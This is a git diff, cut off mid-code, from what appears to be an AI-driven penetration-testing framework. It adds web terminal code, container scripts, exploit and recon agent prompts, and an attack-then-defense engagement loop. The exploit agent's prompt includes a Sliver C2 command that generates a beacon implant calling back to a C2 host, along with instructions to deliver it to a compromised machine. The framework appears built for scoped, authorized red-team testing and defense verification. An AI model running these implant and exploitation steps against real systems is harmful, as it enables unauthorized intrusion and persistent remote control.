reconnecting: "Reconnecting...", + disconnected: "Disconnected", + error: "Connection Error", + }; return ( -
+
+ {/* Status bar */} +
+
+ {statusLabel[connState]} + + {engagementSlug} +
+ {/* Terminal container */} +
+
); } diff --git a/clients/web/src/lib/engagement-context.tsx b/clients/web/src/lib/engagement-context.tsx new file mode 100644 index 00000000..3cf1eef9 --- /dev/null +++ b/clients/web/src/lib/engagement-context.tsx @@ -0,0 +1,66 @@ +"use client"; + +import { createContext, useContext, useState, useCallback, type ReactNode } from "react"; +import type { SubagentCustomEvent } from "@decepticon/streaming"; + +interface EngagementContextValue { + engagementId: string; + engagementSlug: string; + agentId: "soundwave" | "decepticon"; + threadId: string | null; + setThreadId: (id: string) => void; + events: SubagentCustomEvent[]; + isRunning: boolean; + activeRunId: string | null; +} + +const EngagementContext = createContext(null); + +export function useEngagementContext(): EngagementContextValue { + const ctx = useContext(EngagementContext); + if (!ctx) throw new Error("useEngagementContext must be used within EngagementProvider"); + return ctx; +} + +interface EngagementProviderProps { + children: ReactNode; + engagementId: string; + engagementSlug: string; + agentId: "soundwave" | "decepticon"; + events: SubagentCustomEvent[]; + isRunning: boolean; + activeRunId: string | null; +} + +export function EngagementProvider({ + children, + engagementId, + engagementSlug, + agentId, + events, + isRunning, + activeRunId, +}: EngagementProviderProps) { + const [threadId, setThreadId] = useState(null); + + const handleSetThreadId = useCallback((id: string) => { + setThreadId(id); + }, []); + + return ( + + {children} + + ); +} diff --git a/containers/web-entrypoint.sh b/containers/web-entrypoint.sh index c75f87aa..612f04e8 100644 --- a/containers/web-entrypoint.sh +++ b/containers/web-entrypoint.sh @@ -1,13 +1,80 @@ #!/bin/sh -set -e +# Entrypoint for decepticon-web container. 
+# +# Process model: +# PID 1 — this script (trap handler, keeps container alive) +# child — terminal server (ws://0.0.0.0:3003) — long-lived, survives Next.js restarts +# child — Next.js standalone server (:3000) — restartable via SIGUSR1 +# +# SIGUSR1 handler: kills and restarts only the Next.js process. The terminal +# server (and any PTY sessions it manages) stays alive. This is what +# scripts/web-hotswap.sh sends after injecting new .next/ files — zero +# WebSocket disconnection for the operator. +# +# SIGTERM handler: clean shutdown of both processes (docker stop). +set -e cd /app/clients/web -echo "[decepticon-web] Running DB migrations..." -npx prisma migrate deploy +NEXT_PID="" +TERM_PID="" + +# ── Handlers ────────────────────────────────────────────────────── + +restart_next() { + echo "[entrypoint] SIGUSR1 received — restarting Next.js..." + if [ -n "$NEXT_PID" ] && kill -0 "$NEXT_PID" 2>/dev/null; then + kill "$NEXT_PID" 2>/dev/null + wait "$NEXT_PID" 2>/dev/null || true + fi + echo "[entrypoint] Starting Next.js..." + node server.js & + NEXT_PID=$! + echo "[entrypoint] Next.js restarted (PID $NEXT_PID)" +} + +shutdown() { + echo "[entrypoint] SIGTERM received — shutting down..." + [ -n "$NEXT_PID" ] && kill "$NEXT_PID" 2>/dev/null + [ -n "$TERM_PID" ] && kill "$TERM_PID" 2>/dev/null + wait 2>/dev/null + exit 0 +} + +trap restart_next USR1 +trap shutdown TERM INT + +# ── Startup ─────────────────────────────────────────────────────── + +echo "[entrypoint] Running DB migrations..." +npx --yes prisma migrate deploy 2>&1 | grep -v 'npm notice' + +echo "[entrypoint] Starting terminal server (ws://0.0.0.0:${TERMINAL_PORT:-3003})..." +npx --yes tsx server/terminal-server.ts & +TERM_PID=$! + +echo "[entrypoint] Starting Next.js (standalone)..." +node server.js & +NEXT_PID=$! -echo "[decepticon-web] Starting terminal server (ws://0.0.0.0:${TERMINAL_PORT:-3003})..." 
-npx tsx server/terminal-server.ts & +echo "[entrypoint] Ready (terminal=$TERM_PID, next=$NEXT_PID)" -echo "[decepticon-web] Starting Next.js (standalone)..." -exec node server.js +# Wait for either child to exit. If Next.js crashes, restart it. +# If the terminal server crashes, exit (Docker will restart the container). +while true; do + # `wait -n` waits for any one child. Not available in dash/busybox sh, + # so we poll instead. + if ! kill -0 "$TERM_PID" 2>/dev/null; then + echo "[entrypoint] Terminal server died — exiting" + [ -n "$NEXT_PID" ] && kill "$NEXT_PID" 2>/dev/null + exit 1 + fi + if ! kill -0 "$NEXT_PID" 2>/dev/null; then + echo "[entrypoint] Next.js died — restarting..." + sleep 1 + node server.js & + NEXT_PID=$! + echo "[entrypoint] Next.js restarted (PID $NEXT_PID)" + fi + sleep 2 +done diff --git a/containers/web.Dockerfile b/containers/web.Dockerfile index 12bc9788..8f8e1955 100644 --- a/containers/web.Dockerfile +++ b/containers/web.Dockerfile @@ -16,6 +16,7 @@ RUN apt-get update && apt-get install -y --no-install-recommends \ # ---------------------- # deps — install full workspace dependencies (incl. devDependencies for build). +# Layer busted only when package.json or package-lock.json change. # ---------------------- FROM build-base AS deps @@ -30,7 +31,12 @@ RUN npm ci --no-audit --no-fund # ---------------------- # build — prisma generate + next build. -# Granular COPYs so unrelated files don't bust the build cache. +# +# Layer strategy (ordered by change frequency, rarest first): +# 1. node_modules (busted only by package.json changes — deps stage) +# 2. shared libs (changes rarely) +# 3. cli source (changes occasionally) +# 4. 
web source (changes most often — last COPY before build) # ---------------------- FROM build-base AS build @@ -38,14 +44,15 @@ WORKDIR /app COPY --from=deps /app/node_modules ./node_modules COPY package.json package-lock.json ./ -COPY clients/web ./clients/web -COPY clients/cli ./clients/cli + +# Rarely-changing layers first COPY clients/shared ./clients/shared +COPY clients/cli ./clients/cli -# Stamp the package version from the git tag at build time. Source-tree -# package.json files carry a "0.0.0" sentinel; release.yml passes the real -# version via --build-arg. Both web (this image's surface) and cli (spawned -# by the terminal server via PTY) need the patched value. +# Web source last — most frequent changes only bust from here +COPY clients/web ./clients/web + +# Stamp the package version from the git tag at build time. ARG VERSION=0.0.0 RUN sed -i 's/"version": "[^"]*"/"version": "'"$VERSION"'"/' clients/web/package.json && \ sed -i 's/"version": "[^"]*"/"version": "'"$VERSION"'"/' clients/cli/package.json @@ -80,23 +87,28 @@ ENV TERMINAL_PORT=3003 RUN addgroup --system --gid 1001 nodejs && \ adduser --system --uid 1001 nextjs -# Standalone Next.js server -COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/standalone ./ -COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/static ./clients/web/.next/static -COPY --from=build --chown=nextjs:nodejs /app/clients/web/public ./clients/web/public -# Prisma schema + migrations +# Heaviest layer first — cached unless deps change +COPY --from=build --chown=nextjs:nodejs /app/node_modules ./node_modules + +# Prisma schema + migrations (rarely changes) COPY --from=build --chown=nextjs:nodejs /app/clients/web/prisma ./clients/web/prisma COPY --from=build --chown=nextjs:nodejs /app/clients/web/prisma.config.ts ./clients/web/prisma.config.ts -# Terminal WebSocket server -COPY --from=build --chown=nextjs:nodejs /app/clients/web/server ./clients/web/server + +# Shared streaming library +COPY 
--from=build --chown=nextjs:nodejs /app/clients/shared ./clients/shared + # CLI source (spawned by terminal server via PTY) COPY --from=build --chown=nextjs:nodejs /app/clients/cli/src ./clients/cli/src COPY --from=build --chown=nextjs:nodejs /app/clients/cli/package.json ./clients/cli/package.json -# Shared streaming library -COPY --from=build --chown=nextjs:nodejs /app/clients/shared ./clients/shared -# Production workspace dependencies: external Next packages, Prisma CLI, -# node-pty, sharp, and tsx for the current embedded terminal/CLI bridge. -COPY --from=build --chown=nextjs:nodejs /app/node_modules ./node_modules +# Public assets (changes rarely) +COPY --from=build --chown=nextjs:nodejs /app/clients/web/public ./clients/web/public + +# Terminal WebSocket server (changes occasionally) +COPY --from=build --chown=nextjs:nodejs /app/clients/web/server ./clients/web/server + +# Standalone Next.js server + static — changes every build but layer is small (~80MB) +COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/standalone ./ +COPY --from=build --chown=nextjs:nodejs /app/clients/web/.next/static ./clients/web/.next/static WORKDIR /app/clients/web diff --git a/decepticon/agents/decepticon.py b/decepticon/agents/decepticon.py index 96e13a56..3a5ac781 100644 --- a/decepticon/agents/decepticon.py +++ b/decepticon/agents/decepticon.py @@ -88,7 +88,8 @@ def create_decepticon_agent(): # langgraph process never reads from the host filesystem. backend = sandbox - # Build sub-agents from existing agent factories + # Build sub-agents from existing agent factories (lazy-load to avoid + # importing all 8 agent modules on every startup). 
# noqa: PLC0415 from decepticon.agents.ad_operator import create_ad_operator_agent from decepticon.agents.analyst import create_analyst_agent from decepticon.agents.cloud_hunter import create_cloud_hunter_agent diff --git a/decepticon/agents/exploit.py b/decepticon/agents/exploit.py index fe77acbc..a76999f9 100644 --- a/decepticon/agents/exploit.py +++ b/decepticon/agents/exploit.py @@ -38,6 +38,7 @@ methodology_lookup, payload_search, ) +from decepticon.tools.research.exploit_spec_writer import exploit_spec_register from decepticon.tools.research.tools import ( cve_lookup, kg_add_edge, @@ -102,6 +103,8 @@ def create_exploit_agent(): cve_poc_lookup, payload_search, methodology_lookup, + # Vaccine: register machine-readable exploit spec for env-grounded re-attack + exploit_spec_register, # Execution *BASH_TOOLS, ] diff --git a/decepticon/agents/prompts/exploit.md b/decepticon/agents/prompts/exploit.md index 991fb0c7..4ce810f9 100644 --- a/decepticon/agents/prompts/exploit.md +++ b/decepticon/agents/prompts/exploit.md @@ -9,7 +9,7 @@ You are an operator and analyst — not just an exploit runner. Evaluate attack These rules override all other instructions: -1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `exploit/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. +1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `exploit/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. 2. **Sandbox Only**: ALL commands execute via `bash()` inside the Docker sandbox. 
Never attempt host command execution. 3. **RoE Compliance**: Only exploit vulnerabilities explicitly within the Rules of Engagement scope. Verify before every attempt. 4. **Scope Compliance**: Do NOT target systems, services, or accounts outside the authorized boundary. @@ -17,7 +17,7 @@ These rules override all other instructions: 6. **is_input=False by Default**: ALWAYS start commands with `is_input=False`. Only use `is_input=True` when a PREVIOUS command is actively waiting for input. 7. **Evidence Trail**: Document every exploitation attempt — success or failure — with timestamps and technique IDs. 8. **Output Discipline**: Maximum **3 output files** per objective: `exploit/shells.json`, `exploit/creds_initial.json`, and optionally one exploit notes file. Do NOT create README, INDEX, SUMMARY, QUICK_REFERENCE, ASSESSMENT_SUMMARY, or any other organizational documents — they waste context and provide no operational value. -9. **Findings Recording**: For each verified exploited vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Include exploitation evidence (commands, output, access level achieved). Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. +9. **Findings Recording**: For each verified exploited vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Include exploitation evidence (commands, output, access level achieved). Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. 10. **Markdown Only**: ALL deliverable documents MUST be Markdown format. Never write JSON as a report or finding document. (`shells.json` and `creds_initial.json` are operational data files, not deliverable documents.) 
@@ -25,7 +25,7 @@ These rules override all other instructions: ## Sandbox (Docker Container) — Primary Operational Environment - Execute via: `bash(command="...")` - Tools: `sqlmap`, `ysoserial`, `Certipy`, `Rubeus`, `Impacket`, `responder`, `CrackMapExec`, `NetExec`, `BloodHound`, standard Linux utilities -- Canonical artifact paths under the engagement workspace (some may not exist until first use): +- Canonical artifact paths under the engagement workspace (some may not exist until first use): - `plan/roe.json`, `plan/opplan.json` — engagement documents - `recon/` — reconnaissance data (read) - `exploit/` — exploitation output (write) @@ -73,7 +73,7 @@ When exploitation phase is complete: ``` bash(command="sliver-client import /workspace/.sliver-configs/decepticon.cfg") bash(command="sliver-client console", session="c2") - bash(command="generate beacon --mtls c2-sliver:8888 --os --arch amd64 --seconds 30 --jitter 50 --save exploit/implants/", is_input=True, session="c2") + bash(command="generate beacon --mtls c2-sliver:8888 --os --arch amd64 --seconds 30 --jitter 50 --save exploit/implants/", is_input=True, session="c2") ``` Deliver the generated implant to the compromised host and confirm callback. 4. Update OPPLAN status @@ -128,3 +128,12 @@ REMINDER — These rules are absolute and override everything above: - If uncertain whether a target is in scope, STOP and confirm with the orchestrator - Document every exploitation attempt — success or failure — with timestamps and technique IDs + + +## Vaccine Loop: Register Exploit Specs + +After writing FIND-NNN.md for a successful exploit, call `exploit_spec_register` with a self-contained `poc_command`, at least one `success_pattern` (regex matched against PoC stdout/stderr), and `target_checks` for any environment state the exploit depends on (PortCheck/ServiceCheck/CommandOutputCheck/CredentialCheck/FileCheck). Provide a `negative_command` (ZFP baseline) when feasible. 
The EnvironmentVerifier replays this spec after defenses are applied to produce a grounded RLVR reward — no LLM judges the outcome. + +- `impact_patterns`: regexes confirming ACTUAL IMPACT (e.g., `uid=0`, `root@`, data exfiltration patterns). Triager-grade evidence requires at least one impact pattern. +- `runs`: set to 3 for reliable findings, 1 for quick checks. Recommended: 3. +- `min_success_rate`: 0.67 for 2/3 consensus, 1.0 (default) for strict. Use 0.67 for noisy environments. diff --git a/decepticon/agents/prompts/recon.md b/decepticon/agents/prompts/recon.md index 96a9ad49..92578d4f 100644 --- a/decepticon/agents/prompts/recon.md +++ b/decepticon/agents/prompts/recon.md @@ -9,13 +9,13 @@ You are an analyst and collaborator — not just a scanner. Interpret results cr These rules override all other instructions: -1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `recon/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. The bash tmux session starts in that workspace and **persists working directory across calls**: once you `cd recon`, every subsequent `bash()` call in that session is already there. Do NOT prefix every command with repeated absolute workspace paths — it wastes tokens and signals confusion. Run `pwd` once if you are unsure, then trust the session state. +1. **Workspace Root**: Use the `Workspace:` path provided in the task or engagement context as the engagement workspace. Use relative paths under it (`plan/`, `recon/`, `findings/`). Artifact directories are created lazily: do not create empty scaffold directories or placeholder files; create a parent directory only immediately before writing a required artifact. 
The bash tmux session starts in that workspace and **persists working directory across calls**: once you `cd recon`, every subsequent `bash()` call in that session is already there. Do NOT prefix every command with repeated absolute workspace paths — it wastes tokens and signals confusion. Run `pwd` once if you are unsure, then trust the session state. 2. **Sandbox Only**: ALL commands execute via `bash()` inside the Docker sandbox. Never attempt host command execution. 3. **OPSEC First**: Never perform destructive actions. Minimize scan noise. Respect scope boundaries. 4. **Scope Compliance**: Do NOT scan targets outside the engagement boundary under any circumstances. 5. **is_input=False by Default**: ALWAYS start commands with `is_input=False`. Only use `is_input=True` when a PREVIOUS command is actively waiting for input. 6. **Output Discipline**: Maximum **2 output files** per objective: the recon report (`recon/report_.md`) and optionally one raw scan data file. Do NOT create README, INDEX, SUMMARY, QUICK_REFERENCE, ASSESSMENT, or any other organizational documents — they waste context and provide no operational value. -7. **Findings Recording**: For each verified discovered vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. +7. **Findings Recording**: For each verified discovered vulnerability, create a separate `findings/FIND-{NNN}.md` following the FINDING_PROTOCOL template. Save raw evidence to `findings/evidence/` only when it supports that finding. Append to `timeline.jsonl` only for real activity or finding events; never initialize empty placeholder artifacts. 8. **Markdown Only**: ALL deliverable documents MUST be Markdown format. Never write JSON as a report or finding document. 
@@ -23,7 +23,7 @@ These rules override all other instructions: ## Sandbox (Docker Container) — Primary Operational Environment - Execute via: `bash(command="...")` - Tools: `nmap`, `dig`, `whois`, `subfinder`, `curl`, `wget`, `netcat`, standard Linux utilities -- Canonical artifact paths under the engagement workspace (some may not exist until first use): +- Canonical artifact paths under the engagement workspace (some may not exist until first use): - `recon/` — scan results and recon artifacts - `plan/` — engagement documents (roe.json, opplan.json) - `findings/` — individual finding reports (FIND-001.md, FIND-002.md, ...) @@ -115,3 +115,12 @@ REMINDER — These rules are absolute and override everything above: - If uncertain whether a target is in scope, STOP and ask the orchestrator - Save ALL outputs to the engagement workspace directory + + +## Vaccine Loop: Register Exploit Specs + +After writing FIND-NNN.md for a successful exploit, call `exploit_spec_register` with a self-contained `poc_command`, at least one `success_pattern` (regex matched against PoC stdout/stderr), and `target_checks` for any environment state the exploit depends on (PortCheck/ServiceCheck/CommandOutputCheck/CredentialCheck/FileCheck). Provide a `negative_command` (ZFP baseline) when feasible. The EnvironmentVerifier replays this spec after defenses are applied to produce a grounded RLVR reward — no LLM judges the outcome. + +- `impact_patterns`: regexes confirming ACTUAL IMPACT (e.g., `uid=0`, `root@`, data exfiltration patterns). Triager-grade evidence requires at least one impact pattern. +- `runs`: set to 3 for reliable findings, 1 for quick checks. Recommended: 3. +- `min_success_rate`: 0.67 for 2/3 consensus, 1.0 (default) for strict. Use 0.67 for noisy environments. 
diff --git a/decepticon/agents/prompts/scanner.md b/decepticon/agents/prompts/scanner.md index 063b84b8..285f1334 100644 --- a/decepticon/agents/prompts/scanner.md +++ b/decepticon/agents/prompts/scanner.md @@ -73,3 +73,12 @@ that explicitly via the `extensions` parameter (`"sol"`). - Do NOT speculate about exploitability in candidate reasons. State the facts: sink kind, nearby source, file path. Leave judgment to the Detector. + + +## Vaccine Loop: Register Exploit Specs + +After writing FIND-NNN.md for a successful exploit, call `exploit_spec_register` with a self-contained `poc_command`, at least one `success_pattern` (regex matched against PoC stdout/stderr), and `target_checks` for any environment state the exploit depends on (PortCheck/ServiceCheck/CommandOutputCheck/CredentialCheck/FileCheck). Provide a `negative_command` (ZFP baseline) when feasible. The EnvironmentVerifier replays this spec after defenses are applied to produce a grounded RLVR reward — no LLM judges the outcome. + +- `impact_patterns`: regexes confirming ACTUAL IMPACT (e.g., `uid=0`, `root@`, data exfiltration patterns). Triager-grade evidence requires at least one impact pattern. +- `runs`: set to 3 for reliable findings, 1 for quick checks. Recommended: 3. +- `min_success_rate`: 0.67 for 2/3 consensus, 1.0 (default) for strict. Use 0.67 for noisy environments. 
diff --git a/decepticon/agents/recon.py b/decepticon/agents/recon.py index 39202cc0..9e8813ff 100644 --- a/decepticon/agents/recon.py +++ b/decepticon/agents/recon.py @@ -34,6 +34,7 @@ from decepticon.tools.bash import BASH_TOOLS from decepticon.tools.bash.bash import set_sandbox from decepticon.tools.references.tools import killchain_lookup, oneliner_search +from decepticon.tools.research.exploit_spec_writer import exploit_spec_register from decepticon.tools.research.tools import ( kg_add_edge, kg_add_node, @@ -115,6 +116,8 @@ def create_recon_agent(): # References oneliner_search, killchain_lookup, + # Vaccine: register machine-readable exploit spec for env-grounded re-attack + exploit_spec_register, # Execution *BASH_TOOLS, ] diff --git a/decepticon/agents/scanner.py b/decepticon/agents/scanner.py index 59041c29..1b4b6eba 100644 --- a/decepticon/agents/scanner.py +++ b/decepticon/agents/scanner.py @@ -33,6 +33,7 @@ from decepticon.middleware.skills import SkillsMiddleware from decepticon.tools.bash import BASH_TOOLS from decepticon.tools.bash.bash import set_sandbox +from decepticon.tools.research.exploit_spec_writer import exploit_spec_register from decepticon.tools.research.scanner_tools import SCANNER_TOOLS from decepticon.tools.research.tools import kg_query, kg_stats @@ -86,7 +87,7 @@ def create_scanner_agent(): # Tight tool surface: sharded scanner helpers + minimal KG read access + # bash for directory sizing only. NO vuln analysis tools. 
- tools = [*SCANNER_TOOLS, kg_query, kg_stats, *BASH_TOOLS] + tools = [*SCANNER_TOOLS, kg_query, kg_stats, exploit_spec_register, *BASH_TOOLS] agent = create_agent( llm, diff --git a/decepticon/backends/docker_sandbox.py b/decepticon/backends/docker_sandbox.py index 936bd57a..a6e3172e 100644 --- a/decepticon/backends/docker_sandbox.py +++ b/decepticon/backends/docker_sandbox.py @@ -51,7 +51,7 @@ def _docker_cfg(): PS1_PATTERN = re.compile(r"\[DCPTN:(\d+):(.+?)\]") POLL_INTERVAL: float = 0.5 -STALL_SECONDS: float = 3.0 +STALL_SECONDS: float = 5.0 MAX_OUTPUT_CHARS: int = 30_000 AUTO_BACKGROUND_SECONDS: float = 60.0 SIZE_WATCHDOG_CHARS: int = 5_000_000 diff --git a/decepticon/core/config.py b/decepticon/core/config.py index 85be09b7..11db75a5 100644 --- a/decepticon/core/config.py +++ b/decepticon/core/config.py @@ -50,7 +50,7 @@ class DockerConfig(BaseModel): # ── tmux session behavior ── poll_interval: float = Field(0.5, gt=0.0, description="Seconds between capture-pane polls") stall_seconds: float = Field( - 3.0, gt=0.0, description="Seconds of no screen change → treat as interactive prompt" + 5.0, gt=0.0, description="Seconds of no screen change → treat as interactive prompt" ) max_output_chars: int = Field( 30_000, gt=0, description="Truncate command output larger than this" diff --git a/decepticon/core/engagement_loop.py b/decepticon/core/engagement_loop.py new file mode 100644 index 00000000..4d5ce243 --- /dev/null +++ b/decepticon/core/engagement_loop.py @@ -0,0 +1,846 @@ +"""System-level engagement loop — Decepticon's Ralph Mode. + +Follows the Deep Agents ralph_mode.py pattern: a Python async while loop +that invokes LangGraph agents with fresh context per iteration. The +filesystem (workspace/) and Neo4j KG serve as memory across iterations. 
+ +Two autonomous phases (planning is handled by the decepticon main agent): + Phase 2 (attack): Ralph loop iterates OPPLAN objectives with fresh agent per iteration + Phase 3 (vaccine): Batch defense/verification for all accumulated findings + +Prerequisites: + - workspace/plan/opplan.json must exist (generated by decepticon agent via Soundwave) + - workspace/plan/roe.json should exist (scope constraints) + +Usage: + loop = EngagementLoop(workspace, config) + state = await loop.run() # starts at ATTACK phase +""" + +from __future__ import annotations + +import json +import os +import re +import time +import uuid +from datetime import datetime, timezone +from pathlib import Path + +import httpx + +from decepticon.core.engagement import ( + EngagementConfig, + EngagementPhase, + EngagementState, + IterationResult, + VaccineMode, +) +from decepticon.core.env_verifier import EnvironmentVerifier +from decepticon.core.logging import get_logger +from decepticon.core.schemas import OPPLAN, Objective, ObjectiveStatus +from decepticon.schemas.defense_brief import ( + DefenseActionType, + DefenseBrief, + DefenseRecommendation, + ReAttackOutcome, + VerificationResult, +) +from decepticon.schemas.env_verification import CheckPhase +from decepticon.tools.bash.bash import get_sandbox +from decepticon.tools.research.poc import sandbox_runner + +log = get_logger("core.engagement_loop") + + +class EngagementLoop: + """System-level engagement orchestrator following ralph_mode.py pattern.""" + + def __init__(self, workspace: Path, config: EngagementConfig) -> None: + self._workspace = workspace + self._config = config + self._state: EngagementState | None = None + self._opplan: OPPLAN | None = None + sandbox = get_sandbox() + self._verifier: EnvironmentVerifier | None = ( + EnvironmentVerifier(self._workspace, sandbox_runner(sandbox)) + if sandbox is not None + else None + ) + + async def run(self) -> EngagementState: + """Main loop — executes attack and vaccine phases. 
+ + Prerequisites: OPPLAN must already exist at workspace/plan/opplan.json. + The decepticon main agent handles the planning phase (Soundwave interview) + before triggering this loop. + """ + # Load or create state + self._state = EngagementState.load(self._workspace) or EngagementState( + max_iterations=self._config.max_iterations, + workspace=str(self._workspace), + target=self._config.target, + phase=EngagementPhase.ATTACK, + ) + assert self._state is not None + if self._state.resumed_at is None and self._state.iteration > 0: + self._state.resumed_at = datetime.now(timezone.utc) + + # Verify OPPLAN exists (must be created by decepticon agent before loop starts) + self._opplan = self._load_opplan() + if self._opplan is None: + log.error( + "OPPLAN not found at %s/plan/opplan.json — " + "decepticon agent must generate it before starting the loop", + self._workspace, + ) + self._state.phase = EngagementPhase.COMPLETE + self._state.save(self._workspace) + return self._state + + log.info( + "Engagement loop started: phase=%s iteration=%d objectives=%d", + self._state.phase, + self._state.iteration, + len(self._opplan.objectives), + ) + # Recover stale in-progress objectives from a previous crash/restart. + # The loop marks objectives IN_PROGRESS before invoking the agent and + # updates to COMPLETED/BLOCKED after. If the process dies between those + # two writes, the objective is orphaned and never retried. 
+ self._recover_stale_objectives() + + try: + while not self._state.is_complete: + match self._state.phase: + case EngagementPhase.ATTACK: + await self._run_attack_phase() + case EngagementPhase.VACCINE: + await self._run_vaccine_phase() + case EngagementPhase.COMPLETE: + break + case _: + # PLANNING phase is handled by decepticon agent, not this loop + self._state.phase = EngagementPhase.ATTACK + + self._state.save(self._workspace) + + except KeyboardInterrupt: + log.info("Interrupt received — saving state for resume") + if self._state: + self._state.save(self._workspace) + raise + + self._state.phase = EngagementPhase.COMPLETE + self._state.save(self._workspace) + log.info("Engagement complete: %s", self._state.summary) + return self._state + + # ── Phase runners ────────────────────────────────────────────────────────── + + async def _run_attack_phase(self) -> None: + """Ralph-pattern attack loop — one objective per iteration with a fresh agent.""" + assert self._state is not None + + # Reload opplan from disk each iteration (fresh context = ralph pattern) + self._opplan = self._load_opplan() + if self._opplan is None: + log.error("opplan.json missing during attack phase — returning to planning") + self._state.phase = EngagementPhase.PLANNING + return + + obj = self._next_pending_objective() + if obj is None: + log.info("All objectives processed — transitioning to vaccine phase") + self._state.phase = EngagementPhase.VACCINE + return + + self._state.current_objective_id = obj.id + self._state.iteration += 1 + + agent_name = self._select_agent(obj) + prompt = self._build_attack_prompt(obj) + + log.info( + "Attack iteration %d: objective=%s agent=%s", + self._state.iteration, + obj.id, + agent_name, + ) + + start_time = time.time() + # Mark in-progress before invoking + self._update_opplan_objective(obj.id, ObjectiveStatus.IN_PROGRESS) + + result: IterationResult + new_status: ObjectiveStatus + try: + response = await self._invoke_agent(agent_name, prompt) + 
result = self._parse_objective_result(response, obj, agent_name, start_time) + + self._state.iteration_history.append(result) + + if result.outcome == "PASSED": + new_status = ObjectiveStatus.COMPLETED + self._state.objectives_completed.append(obj.id) + else: + new_status = ObjectiveStatus.BLOCKED + self._state.objectives_blocked.append(obj.id) + except KeyboardInterrupt: + raise + except Exception as exc: + log.exception("Objective %s crashed mid-execution — marking BLOCKED", obj.id) + new_status = ObjectiveStatus.BLOCKED + self._state.objectives_blocked.append(obj.id) + result = IterationResult( + objective_id=obj.id, + agent_used=agent_name, + outcome="BLOCKED", + findings_produced=[], + duration_seconds=round(time.time() - start_time, 2), + raw_output=f"Exception: {exc}", + ) + self._state.iteration_history.append(result) + + self._update_opplan_objective(obj.id, new_status) + + # Track findings + for finding_ref in result.findings_produced: + if finding_ref not in self._state.findings_discovered: + self._state.findings_discovered.append(finding_ref) + + # Immediate vaccine mode: apply defense right after finding discovery + if self._config.vaccine_mode == VaccineMode.IMMEDIATE and result.findings_produced: + log.info( + "Immediate vaccine mode — applying defense for %d finding(s)", + len(result.findings_produced), + ) + await self._apply_defenses(result.findings_produced) + + async def _run_vaccine_phase(self) -> None: + """Batch defense/verification for all accumulated findings. + + Merges findings tracked in state with those discovered on disk + (workspace/findings/FIND-*.md) so that findings written by the attack + agents but not captured in state are also processed. 
+ """ + assert self._state is not None + + # Scan filesystem for FIND-*.md files and merge with state-tracked refs + fs_findings = self._scan_findings() + tracked = set(self._state.findings_discovered) + for ref in fs_findings: + if ref not in tracked: + log.info("Vaccine phase: adding filesystem-discovered finding %s to state", ref) + self._state.findings_discovered.append(ref) + tracked.add(ref) + + # A finding is unprocessed if it has no verification result on disk + unprocessed = [ + f + for f in self._state.findings_discovered + if not (self._workspace / f"verification-{f}.json").exists() + ] + + if not unprocessed: + log.info("Vaccine phase: no unprocessed findings — transitioning to COMPLETE") + self._state.phase = EngagementPhase.COMPLETE + return + + log.info( + "Vaccine phase: processing %d finding(s): %s", len(unprocessed), ", ".join(unprocessed) + ) + await self._apply_defenses(unprocessed) + self._state.phase = EngagementPhase.COMPLETE + + # ── Helpers ──────────────────────────────────────────────────────────────── + + async def _apply_defenses(self, finding_refs: list[str]) -> None: + """Generate a defense brief and invoke the defender agent for each finding. + + For each finding: + 1. Parses the finding markdown to build a structured DefenseBrief + 2. Writes brief to workspace/defense-brief.json + 3. Invokes the defender agent with a prompt pointing at the brief + 4. 
Loads the verification result written by the agent and logs outcome + """ + for finding_ref in finding_refs: + brief_path = self._workspace / "defense-brief.json" + brief = self._generate_defense_brief(finding_ref) + if brief is None: + log.warning("Could not generate defense brief for %s — skipping", finding_ref) + continue + try: + brief_path.write_text(brief.model_dump_json(indent=2), encoding="utf-8") + log.info( + "Defense brief written for %s (%d recommended action(s))", + finding_ref, + len(brief.recommended_actions), + ) + except OSError as exc: + log.error("Could not write defense brief for %s: %s", finding_ref, exc) + continue + + defense_prompt = ( + f"## Defense Action Required\n\n" + f"Finding: {finding_ref}\n" + f"Brief: {brief_path}\n" + f"Workspace: {self._workspace}\n\n" + "Read the defense-brief.json, execute the recommended defense actions, " + "re-attack to verify, and write verification results to " + f"verification-{finding_ref}.json. " + "Signal DEFENSE COMPLETE or DEFENSE FAILED when done." 
+ ) + + # Pre-defense environment snapshot for grounded verification + use_env = os.environ.get("VACCINE_USE_ENV_VERIFIER", "1") != "0" + if use_env and self._verifier is not None: + spec = self._verifier.load_spec(finding_ref) + if spec is not None: + pre = await self._verifier.capture_state(spec, phase=CheckPhase.PRE_DEFENSE) + self._verifier.persist_snapshot(pre) + + log.info("Invoking defender agent for %s", finding_ref) + await self._invoke_agent("defender", defense_prompt) + + # Env-grounded verification first; fall back to legacy LLM result + result = await self._verify_finding_env(finding_ref) + if result is not None: + if result.re_attack_outcome == ReAttackOutcome.BLOCKED: + log.info("Defense VERIFIED for %s — re-attack blocked", finding_ref) + else: + log.warning( + "Defense result for %s: outcome=%s", + finding_ref, + result.re_attack_outcome, + ) + else: + log.warning( + "No verification result for %s after defender ran — " + "defense agent may not have written verification-%s.json", + finding_ref, + finding_ref, + ) + + async def _verify_finding_env(self, finding_ref: str) -> VerificationResult | None: + """Try env-grounded verification first; fall back to legacy LLM result.""" + use_env = os.environ.get("VACCINE_USE_ENV_VERIFIER", "1") != "0" + if use_env and self._verifier is not None: + spec = 